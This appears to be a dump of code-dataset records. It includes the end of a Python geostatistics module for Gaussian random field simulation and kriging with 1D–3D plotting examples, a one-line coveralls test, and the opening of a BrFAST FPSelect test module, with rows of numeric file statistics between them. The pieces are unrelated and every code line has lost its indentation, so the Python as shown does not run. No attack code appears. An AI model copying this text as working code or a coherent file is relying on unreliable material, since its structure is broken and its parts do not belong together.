# b) lam(k1,k2,k3) = lam(N1-k1,N2-k2,N3-k3), 1<=k1<=N1-1, 1<=k2<=N2-1, 1<=k3<=N3-1, because the coefficients ccirc are real
lam = np.real(np.fft.fftn(ccirc))
# ...note that the imaginary parts are equal to 0
# Eventual use of approximate embedding
# -------------------------------------
# If some DFT coefficients are negative, then set them to zero
# and update them to fit the marginals distribution (approximate embedding)
if np.min(lam) < 0:
lam = np.sum(lam)/np.sum(np.maximum(lam, 0.)) * np.maximum(lam, 0.)
# Take the square root of the (updated) DFT coefficients
# ------------------------------------------------------
lamSqrt = np.sqrt(lam)
# For specified variance
# ----------------------
# Compute updating factor
if var is not None:
varUpdate = np.sqrt(var/cov_func(np.zeros(3)))
# Kriging
# -------
# Let
# A: index of conditioning nodes
# B: index of non-conditioning nodes
# Zobs: vector of values at conditioning nodes
# and
# + +
# | rAA rAB |
# r = | |
# | rBA rBB |
# + +
# the covariance matrix, where index A (resp. B) refers to
# conditioning (resp. non-conditioning) index in the grid.
#
# Then, the kriging estimates are
# mean + rBA * rAA^(-1) * (v - mean)
# and the kriging standard deviation
# diag(rBB - rBA * rAA^(-1) * rAB)
# Compute the part rAA of the covariance matrix
# Note: if a variance var is specified, then the matrix r should be updated
# by the following operation:
# diag((var/cov_func(0))^1/2) * r * diag((var/cov_func(0))^1/2)
# which is accounting in the computation of kriging estimates and standard
# deviation below
if printInfo:
print('KRIGE3D: Computing covariance matrix (rAA) for conditioning locations...')
# Compute
# indc: node index of conditioning node (nearest node)
indc = np.asarray(np.floor((x-origin)/spacing), dtype=int) # multiple-indices: size n x 3
ix, iy, iz = indc[:, 0], indc[:, 1], indc[:, 2]
if sum(ix < 0) > 0 or sum(ix >= nx):
print('ERROR (KRIGE3D): a conditioning point is out of the grid (x-direction)')
return
if sum(iy < 0) > 0 or sum(iy >= ny):
print('ERROR (KRIGE3D): a conditioning point is out of the grid (y-direction)')
return
if sum(iz < 0) > 0 or sum(iz >= nz):
print('ERROR (KRIGE3D): a conditioning point is out of the grid (z-direction)')
return
indc = ix + iy * nx + iz * nxy # single-indices
if len(np.unique(indc)) != len(x):
print('ERROR (KRIGE3D): more than one conditioning point in a same grid cell')
nc = len(x)
# rAA
rAA = np.zeros((nc, nc))
diagEntry = ccirc[0, 0, 0] + measureErrVar
for i in range(nc):
rAA[i,i] = diagEntry
for j in range(i+1, nc):
rAA[i,j] = ccirc[np.mod(iz[j]-iz[i], N3), np.mod(iy[j]-iy[i], N2), np.mod(ix[j]-ix[i], N1)]
rAA[j,i] = rAA[i,j]
# Test if rAA is almost singular...
if 1./np.linalg.cond(rAA) < tolInvKappa:
print('ERROR (GRF3D): conditioning issue: condition number of matrix rAA is too big')
return
# Compute:
# indnc: node index of non-conditioning node (nearest node)
indnc = np.asarray(np.setdiff1d(np.arange(nxyz), indc), dtype=int)
nnc = len(indnc)
kz = np.floor_divide(indnc, nxy)
kk = np.mod(indnc, nxy)
ky = np.floor_divide(kk, nx)
kx = np.mod(kk, nx)
del(kk)
# Initialize
krig = np.zeros(nz*ny*nx)
if computeKrigSD:
krigSD = np.zeros(nz*ny*nx)
if mean.size == 1:
v = v - mean
else:
v = v - mean.reshape(-1)[indc]
if var is not None and var.size > 1:
v = 1./varUpdate.reshape(-1)[indc] * v
if conditioningMethod == 1:
# Method ConditioningA
# --------------------
if printInfo:
print('KRIGE3D: Computing covariance matrix (rBA) for non-conditioning / conditioning locations...')
# Compute the parts rBA of the covariance matrix (see above)
# rBA
rBA = np.zeros((nnc, nc))
for j in range(nc):
rBA[:,j] = ccirc[np.mod(iz[j] - kz, N3), np.mod(iy[j] - ky, N2), np.mod(ix[j] - kx, N1)]
del(ix, iy, iz, kx, ky, kz)
del(ccirc)
if printInfo:
print('KRIGE3D: Computing rBA * rAA^(-1)...')
# compute rBA * rAA^(-1)
rBArAAinv = np.dot(rBA, np.linalg.inv(rAA))
del(rAA)
if not computeKrigSD:
del(rBA)
# Compute kriging estimates
if printInfo:
print('KRIGE3D: computing kriging estimates...')
krig[indnc] = np.dot(rBArAAinv, v)
krig[indc] = v
if computeKrigSD:
# Compute kriging standard deviation
if printInfo:
print('KRIGE3D: computing kriging standard deviation ...')
for j in range(nnc):
krigSD[indnc[j]] = np.dot(rBArAAinv[j,:], rBA[j,:])
krigSD[indnc] = np.sqrt(np.maximum(diagEntry - krigSD[indnc], 0.))
del(rBA)
elif conditioningMethod == 2:
# Method ConditioningB
# --------------------
if not computeKrigSD:
del(ccirc)
if printInfo:
print('KRIGE3D: Computing index in the embedding grid for non-conditioning / conditioning locations...')
# Compute index in the embedding grid for indc and indnc
# (to allow use of fft)
indcEmb = iz * N12 + iy * N1 + ix
indncEmb = kz * N12 + ky * N1 + kx
# Compute kriging estimates
if printInfo:
print('KRIGE3D: computing kriging estimates...')
# Compute
# u = rAA^(-1) * v, and then
# Z = rBA * u via the circulant embedding of the covariance matrix
uEmb = np.zeros(N3*N2*N1)
uEmb[indcEmb] = np.linalg.solve(rAA, v)
Z = np.fft.ifftn(lam * np.fft.fftn(uEmb.reshape(N3, N2, N1)))
# ...note that Im(Z) = 0
krig[indnc] = np.real(Z.reshape(-1)[indncEmb])
krig[indc] = v
if computeKrigSD:
# Compute kriging standard deviation
if printInfo:
print('KRIGE3D: computing kriging standard deviation ...')
for j in range(nnc):
u = ccirc[np.mod(iz - kz[j], N3), np.mod(iy - ky[j], N2), np.mod(ix - kx[j], N1)] # j-th row of rBA
krigSD[indnc[j]] = np.dot(u,np.linalg.solve(rAA, u))
del(ccirc)
krigSD[indnc] = np.sqrt(np.maximum(diagEntry - krigSD[indnc], 0.))
del(ix, iy, iz, kx, ky, kz)
# ... update if non stationary covariance is specified
if var is not None:
if var.size > 1:
krig = varUpdate.reshape(-1) * krig
if computeKrigSD:
krigSD = varUpdate.reshape(-1) * krigSD
krig.resize(nz, ny, nx)
if computeKrigSD:
krigSD.resize(nz, ny, nx)
krig = krig + mean
if computeKrigSD:
return ([krig, krigSD])
else:
return (krig)
# ----------------------------------------------------------------------------
if __name__ == "__main__":
print("Module 'geone.grf' example:")
import time
import matplotlib.pyplot as plt
import pyvista as pv
from geone import img
from geone import imgplot as imgplt
from geone import imgplot3d as imgplt3
from geone import covModel as gcm
########## 1D case ##########
# Define grid
nx = 2000
dx = 0.5
ox = 0.0
# Define covariance model
cov_model1 = gcm.CovModel1D(elem=[
('gaussian', {'w':8.95, 'r':100}), # elementary contribution
('nugget', {'w':0.05}) # elementary contribution
], name='')
# Define mean and variance of GRF
mean = 10.
# mean = np.linspace(5, 15, nx)
var = None
# var = np.linspace(1, 200, nx)
# Define hard data
x = [10., 50., 400., 800.]
v = [ 8., 9., 8., 12.]
# x, v = None, None
# Set number of realizations
nreal = 2000
# Set seed
np.random.seed(123)
# Generate GRF
t1 = time.time()
grf1 = grf1D(cov_model1, nx, dx, origin=ox,
nreal=nreal, mean=mean, var=var,
x=x, v=v,
method=3, conditioningMethod=2 ) # grf1: (nreal,nx) array
t2 = time.time()
time_case1D = t2-t1
nreal_case1D = nreal
infogrid_case1D = 'grid: {} cells'.format(nx)
# print('Elapsed time: {} sec'.format(time_case1D))
grf1_mean = np.mean(grf1, axis=0) # mean along axis 0
grf1_std = np.std(grf1, axis=0) # standard deviation along axis 0
if x is not None:
# Kriging
t1 = time.time()
krig1, krig1_std = krige1D(x, v, cov_model1, nx, dx, origin=ox,
mean=mean, var=var,
conditioningMethod=2)
t2 = time.time()
time_krig_case1D = t2-t1
#print('Elapsed time for kriging: {} sec'.format(time_krig_case1D))
peak_to_peak_mean1 = np.ptp(grf1_mean - krig1)
peak_to_peak_std1 = np.ptp(grf1_std - krig1_std)
krig1D_done = True
else:
krig1D_done = False
# Display
# -------
# xg: center of grid points
xg = ox + dx * (0.5 + np.arange(nx))
# === 4 real and mean and sd of all real
fig, ax = plt.subplots(figsize=(20,10))
for i in range(4):
plt.plot(xg, grf1[i], label='real #{}'.format(i+1))
plt.plot(xg, grf1_mean, c='black', ls='dashed', label='mean ({} real)'.format(nreal))
plt.fill_between(xg, grf1_mean - grf1_std, grf1_mean + grf1_std, color='gray', alpha=0.5, label='mean +/- sd ({} real)'.format(nreal))
if x is not None:
plt.plot(x, v,'+k', markersize=10)
plt.legend()
plt.title('GRF1D')
# fig.show()
plt.show()
if x is not None:
# === 4 real and kriging estimates and sd
fig, ax = plt.subplots(figsize=(20,10))
for i in range(4):
plt.plot(xg, grf1[i], label='real #{}'.format(i+1))
plt.plot(xg, krig1, c='black', ls='dashed', label='kriging')
plt.fill_between(xg, krig1 - krig1_std, krig1 + krig1_std, color='gray', alpha=0.5, label='kriging +/- sd')
plt.plot(x,v,'+k', markersize=10)
plt.legend()
plt.title('GRF1D AND KRIGE1D')
# fig.show()
plt.show()
# === comparison of mean and sd of all real, with kriging estimates and sd
fig, ax = plt.subplots(figsize=(20,10))
plt.plot(xg, grf1_mean - krig1, c='black', label='grf1_mean - krig')
plt.plot(xg, grf1_std - krig1_std, c='red', label='grf1_std - krig1_std')
plt.axhline(y=0)
for xx in x:
plt.axvline(x=xx)
plt.legend()
plt.title('GRF1D and KRIGE1D / nreal={}'.format(nreal))
# fig.show()
plt.show()
del(krig1, krig1_std)
del (grf1, grf1_mean, grf1_std)
########## 2D case ##########
# Define grid
nx, ny = 231, 249
dx, dy = 1., 1.
ox, oy = 0., 0.
dimension = [nx, ny]
spacing = [dx, dy]
origin = [ox, oy]
# Define covariance model
cov_model2 = gcm.CovModel2D(elem=[
('gaussian', {'w':8.5, 'r':[150, 40]}), # elementary contribution
('nugget', {'w':0.5}) # elementary contribution
], alpha=-30., name='')
# Define mean and variance of GRF
mean = 10.
# mean = sum(np.meshgrid(np.linspace(2, 8, nx), np.linspace(2, 8, ny)))
var = None
# var = sum(np.meshgrid(np.linspace(2, 100, nx), np.linspace(2, 100, ny)))
# Define hard data
x = np.array([[ 10., 20.], # 1st point
[ 50., 40.], # 2nd point
[ 20., 150.], # 3rd point
[200., 210.]]) # 4th point
v = [ 8., 9., 8., 12.] # values
# x, v = None, None
# Set number of realizations
nreal = 1000
# Set seed
np.random.seed(123)
# Generate GRF
t1 = time.time()
grf2 = grf2D(cov_model2, dimension, spacing, origin=origin,
nreal=nreal, mean=mean, var = var,
x=x, v=v,
method=3, conditioningMethod=2) # grf2: (nreal,ny,nx) array
t2 = time.time()
nreal_case2D = nreal
time_case2D = t2-t1
infogrid_case2D = 'grid: {} cells ({} x {})'.format(nx*ny, nx, ny)
# print('Elapsed time: {} sec'.format(time_case2D))
# Fill an image (Img class) (for display, see below)
im2 = img.Img(nx, ny, 1, dx, dy, 1., ox, oy, 0., nv=nreal, val=grf2)
del(grf2)
# Compute mean and standard deviation over the realizations
im2_mean = img.imageContStat(im2, op='mean') # pixel-wise mean
im2_std = img.imageContStat(im2, op='std') # pixel-wise standard deviation
# grf2_mean = np.mean(grf.reshape(nreal, -1), axis=0).reshape(ny, nx)
# grf2_std = np.std(grf.reshape(nreal, -1), axis=0).reshape(ny, nx)
if x is not None:
# Kriging
t1 = time.time()
krig2, krig2_std = krige2D(x, v, cov_model2, dimension, spacing, origin=origin,
mean=mean, var=var,
conditioningMethod=2)
t2 = time.time()
time_krig_case2D = t2-t1
# print('Elapsed time for kriging: {} sec'.format(time_krig_case2D))
# Fill an image (Img class) (for display, see below)
im2_krig = img.Img(nx, ny, 1, dx, dy, 1., ox, oy, 0., nv=2, val=np.array((krig2, krig2_std)))
del(krig2, krig2_std)
peak_to_peak_mean2 = np.ptp(im2_mean.val[0] - im2_krig.val[0])
peak_to_peak_std2 = np.ptp(im2_mean.val[0] - im2_krig.val[1])
krig2D_done = True
else:
krig2D_done = False
# Display (using geone.imgplot)
# -------
# === 4 real and mean and standard deviation of all real
# and kriging estimates and standard deviation (if conditional)
if x is not None:
nc = 4
else:
nc = 3
fig, ax = plt.subplots(2, nc, figsize=(24,12))
# 4 first real ...
pnum = [1, 2, nc+1, nc+2]
for i in range(4):
plt.subplot(2, nc, pnum[i])
imgplt.drawImage2D(im2, iv=i)
if x is not None:
plt.plot(x[:,0],x[:,1],'+k', markersize=10)
plt.title('GRF2D {}: real #{}'.format(cov_model2.name, i+1))
# mean of all real
plt.subplot(2, nc, 3)
imgplt.drawImage2D(im2_mean)
if x is not None:
plt.plot(x[:,0],x[:,1],'+k', markersize=10)
plt.title('Mean over {} real'.format(nreal))
# standard deviation of all real
plt.subplot(2, nc, nc+3)
imgplt.drawImage2D(im2_std, cmap='viridis')
if x is not None:
plt.plot(x[:,0],x[:,1],'+k', markersize=10)
plt.title('St. dev. over {} real'.format(nreal))
if x is not None:
# kriging estimates
plt.subplot(2, nc, 4)
imgplt.drawImage2D(im2_krig, iv=0)
plt.plot(x[:,0],x[:,1],'+k', markersize=10)
plt.title('Kriging estimates')
# kriging standard deviation
plt.subplot(2, nc, nc+4)
imgplt.drawImage2D(im2_krig, iv=1, cmap='viridis')
plt.plot(x[:,0],x[:,1],'+k', markersize=10)
plt.title('Kriging st. dev.')
plt.suptitle('GRF2D and KRIGE2D')
# fig.show()
plt.show()
if x is not None:
# === comparison of mean and st. dev. of all real, with kriging estimates and st. dev.
fig, ax = plt.subplots(1,2,figsize=(15,5))
# grf mean - kriging estimates
im_tmp = img.copyImg(im2_mean)
im_tmp.val[0] = im_tmp.val[0] - im2_krig.val[0]
plt.subplot(1,2,1)
imgplt.drawImage2D(im_tmp, cmap='viridis')
plt.plot(x[:,0],x[:,1],'+k', markersize=10)
plt.title('grf mean - kriging estimates / nreal={}'.format(nreal))
# grf st. dev. - kriging st. dev.
im_tmp = img.copyImg(im2_std)
im_tmp.val[0] = im_tmp.val[0] - im2_krig.val[1]
plt.subplot(1,2,2)
imgplt.drawImage2D(im_tmp, cmap='viridis')
plt.plot(x[:,0],x[:,1],'+k', markersize=10)
plt.title('grf st. dev. - kriging st. dev. / nreal={}'.format(nreal))
plt.suptitle('GRF2D and KRIGE2D: comparisons')
# fig.show()
plt.show()
del(im2_krig)
del(im2, im2_mean, im2_std)
########## 3D case ##########
# Define grid
nx, ny, nz = 85, 56, 34
dx, dy, dz = 1., 1., 1.
ox, oy, oz = 0., 0., 0.
dimension = [nx, ny, nz]
spacing = [dx, dy, dy]
origin = [ox, oy, oz]
# Define covariance model
cov_model3 = gcm.CovModel3D(elem=[
('gaussian', {'w':8.5, 'r':[40, 20, 10]}), # elementary contribution
('nugget', {'w':0.5}) # elementary contribution
], alpha=-30., beta=-40., gamma=20., name='')
# Define mean and variance of GRF
mean = 10.
# mean = sum(np.meshgrid(np.linspace(2, 10, ny), np.linspace(2, 8, nz), np.repeat(0, nx))) # as this!!!
var = None
# var = sum(np.meshgrid(np.linspace(2, 400, ny), np.repeat(0, nz), np.linspace(2, 100, nx))) # as this!!!
# Define hard data
x = np.array([[ 10.5, 20.5, 3.5], # 1st point
[ 40.5, 10.5, 10.5], # 2nd point
[ 30.5, 40.5, 20.5], # 3rd point
[ 30.5, 30.5, 30.5]]) # 4th point
v = [ -3., 2., 5., -1.] # values
# x, v = None, None
# Set number of realizations
nreal = 500
# Set seed
np.random.seed(123)
# Generate GRF
t1 = time.time()
grf3 = grf3D(cov_model3, dimension, spacing, origin=origin,
nreal=nreal, mean=mean, var=var,
x=x, v=v,
method=3, conditioningMethod=2) # grf: (nreal,nz,ny,nx) array
t2 = time.time()
nreal_case3D = nreal
time_case3D = t2-t1
infogrid_case3D = 'grid: {} cells ({} x {} x {})'.format(nx*ny*nz, nx, ny, nz)
# print('Elapsed time: {} sec'.format(time_case3D))
# Fill an image (Img class) (for display, see below)
im3 = img.Img(nx, ny, nz, dx, dy, dz, ox, oy, oz, nv=nreal, val=grf3)
del(grf3)
# Compute mean and standard deviation over the realizations
im3_mean = img.imageContStat(im3, op='mean') # pixel-wise mean
im3_std = img.imageContStat(im3, op='std') # pixel-wise standard deviation
# grf3_mean = np.mean(grf.reshape(nreal, -1), axis=0).reshape(nz, ny, nx)
# grf3_std = np.std(grf.reshape(nreal, -1), axis=0).reshape(nz, ny, nx)
if x is not None:
# Kriging
t1 = time.time()
krig3, krig3_std = krige3D(x, v, cov_model3, dimension, spacing, origin=origin,
mean=mean, var=var,
conditioningMethod=2)
t2 = time.time()
time_krig_case3D = t2-t1
# print('Elapsed time for kriging: {} sec'.format(time_krig_case3D))
# Fill an image (Img class) (for display, see below)
im3_krig = img.Img(nx, ny, nz, dx, dy, dz, ox, oy, oz, nv=2, val=np.array((krig3, krig3_std)))
del(krig3, krig3_std)
peak_to_peak_mean3 = np.ptp(im3_mean.val[0] - im3_krig.val[0])
peak_to_peak_std3 = np.ptp(im3_mean.val[0] - im3_krig.val[1])
krig3D_done = True
else:
krig3D_done = False
# Display (using geone.imgplot3d)
# -------
# === Show first real - volume in 3D
imgplt3.drawImage3D_volume(im3, iv=0,
text='GRF3D: real #1',
cmap='nipy_spectral', scalar_bar_kwargs={'vertical':True, 'title':None})
# === Show first real - (out) surface in 3D
imgplt3.drawImage3D_surface(im3, iv=0,
text='GRF3D: real #1',
cmap='nipy_spectral', scalar_bar_kwargs={'vertical':True, 'title':None})
# === Show first real - slices in 3D block
# ... slices orthogonal to axes and going through the center of image
cx = im3.ox + 0.5 * im3.nx * im3.sx
cy = im3.oy + 0.5 * im3.ny * im3.sy
cz = im3.oz + 0.5 * im3.nz * im3.sz # center of image (cx, cy, cz)
imgplt3.drawImage3D_slice(im3, iv=0,
slice_normal_x=cx,
slice_normal_y=cy,
slice_normal_z=cz,
text='GRF3D: real #1',
cmap='nipy_spectral', scalar_bar_kwargs={'vertical':True, 'title':None})
# === Show first real - slices in 3D block
# ... slices orthogonal to axes and going through the first data point
# + display the data points
cmap = plt.get_cmap('nipy_spectral') # color map
cmin=im3.vmin()[0] # min value for real 0
cmax=im3.vmax()[0] # max value for real 0
data_points_col = [cmap((vv-cmin)/(cmax-cmin)) for vv in v] # color for data points according to their value
pp = pv.Plotter()
imgplt3.drawImage3D_slice(im3, iv=0, plotter=pp,
slice_normal_x=x[0,0],
slice_normal_y=x[0,1],
slice_normal_z=x[0,2],
show_bounds=True,
text='GRF3D: real #1',
cmap=cmap, cmin=cmin, cmax=cmax, scalar_bar_kwargs={'vertical':True, 'title':None}) # specify color map and cmin, cmax
data_points = pv.PolyData(x)
data_points['colors'] = data_points_col
pp.add_mesh(data_points, cmap=cmap, rgb=True,
point_size=20., render_points_as_spheres=True)
pp.show()
# === Show first real - slices in 3D block
# ... slices orthogonal to axes supporting the ranges according to rotation
# defined in the covariance model and going through the center of image
mrot = cov_model3.mrot()
imgplt3.drawImage3D_slice(im3, iv=0,
slice_normal_custom=[[mrot[:,0], (cx, cy, cz)], [mrot[:,1], (cx, cy, cz)], [mrot[:,2], (cx, cy, cz)]],
text='GRF3D: real #1',
cmap='nipy_spectral', scalar_bar_kwargs={'vertical':True, 'title':None})
# === Show two first reals, mean and st. dev. over real,
# and kriging estimates and standard deviation (if conditional)
# - volume in 3D
if x is not None:
nc = 3
else:
nc = 2
pp = pv.Plotter(shape=(2, nc))
# 2 first reals
for i in (0, 1):
pp.subplot(i, 0)
imgplt3.drawImage3D_volume(im3, iv=i, plotter=pp,
text='GRF3D: real #{}'.format(i+1),
cmap='nipy_spectral', scalar_bar_kwargs={'vertical':True, 'title':None})
# mean of all real
pp.subplot(0, 1)
imgplt3.drawImage3D_volume(im3_mean, plotter=pp,
text='GRF3D: mean over {} real'.format(nreal),
cmap='nipy_spectral', scalar_bar_kwargs={'vertical':True, 'title':None})
# standard deviation of all real
pp.subplot(1, 1)
imgplt3.drawImage3D_volume(im3_std, plotter=pp,
text='GRF3D: st. dev. over {} real'.format(nreal),
cmap='viridis', scalar_bar_kwargs={'vertical':True, 'title':None})
if x is not None:
# kriging estimates
pp.subplot(0, 2)
imgplt3.drawImage3D_volume(im3_krig, iv=0, plotter=pp,
text='GRF3D: kriging estimates',
cmap='nipy_spectral', scalar_bar_kwargs={'vertical':True, 'title':None})
# kriging standard deviation
pp.subplot(1, 2)
imgplt3.drawImage3D_volume(im3_krig, iv=1, plotter=pp,
text='GRF3D: kriging st. dev.',
cmap='viridis', scalar_bar_kwargs={'vertical':True, 'title':None})
pp.link_views()
pp.show()
# === Show two first reals, mean and st. dev. over real,
# and kriging estimates and standard deviation (if conditional)
# - slices in 3D block
# ... slices orthogonal to axes and going through the center of image
if x is not None:
nc = 3
else:
nc = 2
pp = pv.Plotter(shape=(2, nc))
# 2 first reals
for i in (0, 1):
pp.subplot(i, 0)
imgplt3.drawImage3D_slice(im3, iv=i, plotter=pp,
slice_normal_x=cx,
slice_normal_y=cy,
slice_normal_z=cz,
text='GRF3D: real #{}'.format(i+1),
cmap='nipy_spectral', scalar_bar_kwargs={'vertical':True, 'title':None})
# mean of all real
pp.subplot(0, 1)
imgplt3.drawImage3D_slice(im3_mean, plotter=pp,
slice_normal_x=cx,
slice_normal_y=cy,
slice_normal_z=cz,
text='GRF3D: mean over {} real'.format(nreal),
cmap='nipy_spectral', scalar_bar_kwargs={'vertical':True, 'title':None})
# mean of all real
pp.subplot(1, 1)
imgplt3.drawImage3D_slice(im3_std, plotter=pp,
slice_normal_x=cx,
slice_normal_y=cy,
slice_normal_z=cz,
text='GRF3D: st. dev. over {} real'.format(nreal),
cmap='viridis', scalar_bar_kwargs={'vertical':True, 'title':None})
if x is not None:
# kriging estimates
pp.subplot(0, 2)
imgplt3.drawImage3D_slice(im3_krig, iv=0, plotter=pp,
slice_normal_x=cx,
slice_normal_y=cy,
slice_normal_z=cz,
text='GRF3D: kriging estimates',
cmap='nipy_spectral', scalar_bar_kwargs={'vertical':True, 'title':None})
# kriging standard deviation
pp.subplot(1, 2)
imgplt3.drawImage3D_slice(im3_krig, iv=1, plotter=pp,
slice_normal_x=cx,
slice_normal_y=cy,
slice_normal_z=cz,
text='GRF3D: kriging st. dev.',
cmap='viridis', scalar_bar_kwargs={'vertical':True, 'title':None})
pp.link_views()
pp.show()
if x is not None:
# === Show comparison of mean and st. dev. of all real, with kriging estimates and st. dev.
# - volume in 3D
pp = pv.Plotter(shape=(1, 2))
# grf mean - kriging estimates
im_tmp = img.copyImg(im3_mean)
im_tmp.val[0] = im_tmp.val[0] - im3_krig.val[0]
pp.subplot(0, 0)
imgplt3.drawImage3D_volume(im_tmp, plotter=pp,
text='GRF3D: grf mean - kriging estimates / nreal={}'.format(nreal),
cmap='viridis', scalar_bar_kwargs={'vertical':True, 'title':None})
# grf st. dev. - kriging st. dev.
im_tmp = img.copyImg(im3_std)
im_tmp.val[0] = im_tmp.val[0] - im3_krig.val[1]
pp.subplot(0, 1)
imgplt3.drawImage3D_volume(im_tmp, plotter=pp,
text='GRF3D: grf st. dev. - kriging st. dev. / nreal={}'.format(nreal),
cmap='viridis', scalar_bar_kwargs={'vertical':True, 'title':None})
pp.link_views()
pp.show()
del(im3_krig)
del(im3, im3_mean, im3_std)
######### Print info: elapsed time, peak to peak for "mean of real - krig est." and "std. of real - krig std." ##########
print('Case 1D\n-------')
print(' Simulation - elapsed time: {:5.2f} sec ({} real, {})'.format(time_case1D, nreal_case1D, infogrid_case1D))
print(' Kriging - elapsed time: {:5.2f} sec'.format(time_krig_case1D))
if krig1D_done:
print(' Peak to peak for "grf1_mean - krig1" : {}'.format(peak_to_peak_mean1))
print(' Peak to peak for "grf1_std - krig1_std": {}'.format(peak_to_peak_std1))
print('\n')
print('Case 2D\n-------')
print(' Simulation - elapsed time: {:5.2f} sec ({} real, {})'.format(time_case2D, nreal_case2D, infogrid_case2D))
print(' Kriging - elapsed time: {:5.2f} sec'.format(time_krig_case2D))
if krig2D_done:
print(' Peak to peak for "grf2_mean - krig2" : {}'.format(peak_to_peak_mean2))
print(' Peak to peak for "grf2_std - krig2_std": {}'.format(peak_to_peak_std2))
print('\n')
print('Case 3D\n-------')
print(' Simulation - elapsed time: {:5.2f} sec ({} real, {})'.format(time_case3D, nreal_case3D, infogrid_case3D))
print(' Kriging - elapsed time: {:5.2f} sec'.format(time_krig_case3D))
if krig3D_done:
print(' Peak to peak for "grf3_mean - krig3" : {}'.format(peak_to_peak_mean3))
print(' Peak to peak for "grf3_std - krig3_std": {}'.format(peak_to_peak_std3))
######### END ##########
a = input("Press enter to continue...")
| 40.955766
| 138
| 0.516445
| 19,423
| 155,550
| 4.108377
| 0.037996
| 0.00708
| 0.01584
| 0.004135
| 0.940261
| 0.924997
| 0.911613
| 0.899545
| 0.890184
| 0.871562
| 0
| 0.02781
| 0.361273
| 155,550
| 3,797
| 139
| 40.966553
| 0.775349
| 0.537879
| 0
| 0.736491
| 0
| 0
| 0.148188
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.00467
| false
| 0
| 0.005337
| 0
| 0.05537
| 0.164109
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8cf1aaa63f4a738ab93206f90924f1b8b1c69477
| 140
|
py
|
Python
|
tests/test_coveralls_project_exists.py
|
LucaCappelletti94/setup_python_package
|
61b5f3cff1ed3181f932293c63c4fcb71cbe0062
|
[
"MIT"
] | 5
|
2019-09-17T14:46:35.000Z
|
2020-06-06T08:17:02.000Z
|
tests/test_coveralls_project_exists.py
|
LucaCappelletti94/setup_python_package
|
61b5f3cff1ed3181f932293c63c4fcb71cbe0062
|
[
"MIT"
] | 2
|
2020-12-18T01:47:55.000Z
|
2020-12-25T10:08:30.000Z
|
tests/test_coveralls_project_exists.py
|
LucaCappelletti94/setup_python_package
|
61b5f3cff1ed3181f932293c63c4fcb71cbe0062
|
[
"MIT"
] | null | null | null |
from setup_python_package.utils import coveralls_project_exists
def test_coveralls_project_exists():
assert coveralls_project_exists()
| 28
| 63
| 0.864286
| 18
| 140
| 6.222222
| 0.666667
| 0.428571
| 0.589286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.092857
| 140
| 5
| 64
| 28
| 0.88189
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
50d98adfb7269b25065da66e4367978ff0fa0f0d
| 14,611
|
py
|
Python
|
tests/exploration/test_fpselect.py
|
tandriamil/BrFAST
|
b687a356acc813d45dbaf5b5eb0f360df181904a
|
[
"MIT"
] | 6
|
2021-04-20T17:33:17.000Z
|
2021-12-20T18:59:58.000Z
|
tests/exploration/test_fpselect.py
|
tandriamil/BrFAST
|
b687a356acc813d45dbaf5b5eb0f360df181904a
|
[
"MIT"
] | null | null | null |
tests/exploration/test_fpselect.py
|
tandriamil/BrFAST
|
b687a356acc813d45dbaf5b5eb0f360df181904a
|
[
"MIT"
] | 2
|
2021-12-20T19:00:03.000Z
|
2022-03-22T01:57:41.000Z
|
#!/usr/bin/python3
"""Test module of the exploration module of BrFAST.
The data used for the tests is a simple simulation of the lattice example of
our FPSelect paper.
"""
import importlib
import json
import unittest
from math import log2
from os import path, remove
from pathlib import PurePath
from typing import Any, Dict
from brfast.config import ANALYSIS_ENGINES
from brfast.data.attribute import AttributeSet
from brfast.exploration import (
Exploration, ExplorationNotRun, ExplorationParameters,
SensitivityThresholdUnreachable, State, TraceData)
from brfast.exploration.fpselect import FPSelect, FPSelectParameters
from brfast.measures import UsabilityCostMeasure, SensitivityMeasure
from tests.data import ATTRIBUTES, DummyCleanDataset
from tests.exploration import SENSITIVITY_THRESHOLD, TRACE_FILENAME
from tests.exploration.test_exploration import TestExploration
from tests.measures import DummySensitivity, DummyUsabilityCostMeasure
# Import the engine of the analysis module (pandas or modin)
from brfast.config import params
pd = importlib.import_module(params['DataAnalysis']['engine'])
TRACES_DIRECTORY = 'assets/traces'
EXPECTED_TRACE_PATH_MULTIPATH_PRUNING_ON = '/'.join(
[TRACES_DIRECTORY, 'expected_trace_fpselect_multipath_pruning_on.json'])
EXPECTED_TRACE_PATH_MULTIPATH_PRUNING_OFF = '/'.join(
[TRACES_DIRECTORY, 'expected_trace_fpselect_multipath_pruning_off.json'])
EXPECTED_TRACE_PATH_SINGLEPATH_PRUNING_ON = '/'.join(
[TRACES_DIRECTORY, 'expected_trace_fpselect_singlepath_pruning_on.json'])
EXPECTED_TRACE_PATH_SINGLEPATH_PRUNING_OFF = '/'.join(
[TRACES_DIRECTORY, 'expected_trace_fpselect_singlepath_pruning_off.json'])
MULTI_EXPLR_PATHS = 2
PRUNING_ON = True
PRUNING_OFF = False
# ======= FPSelect with a single process and using the DummyCleanDataset ======
class TestFPSelectSinglePathPruningOn(TestExploration):
def setUp(self):
self._dataset = DummyCleanDataset()
self._sensitivity_measure = DummySensitivity()
self._usability_cost_measure = DummyUsabilityCostMeasure()
self._sensitivity_threshold = SENSITIVITY_THRESHOLD
self._trace_path = TRACE_FILENAME
self._expected_trace_path = EXPECTED_TRACE_PATH_SINGLEPATH_PRUNING_ON
self._explored_paths = 1
self._pruning = PRUNING_ON
self._exploration = FPSelect(
self._sensitivity_measure, self._usability_cost_measure,
self._dataset, self._sensitivity_threshold,
explored_paths=self._explored_paths, pruning=self._pruning)
params.set('Multiprocessing', 'explorations', 'false')
def test_exploration_base_class(self):
pass # This selection method defines the run method
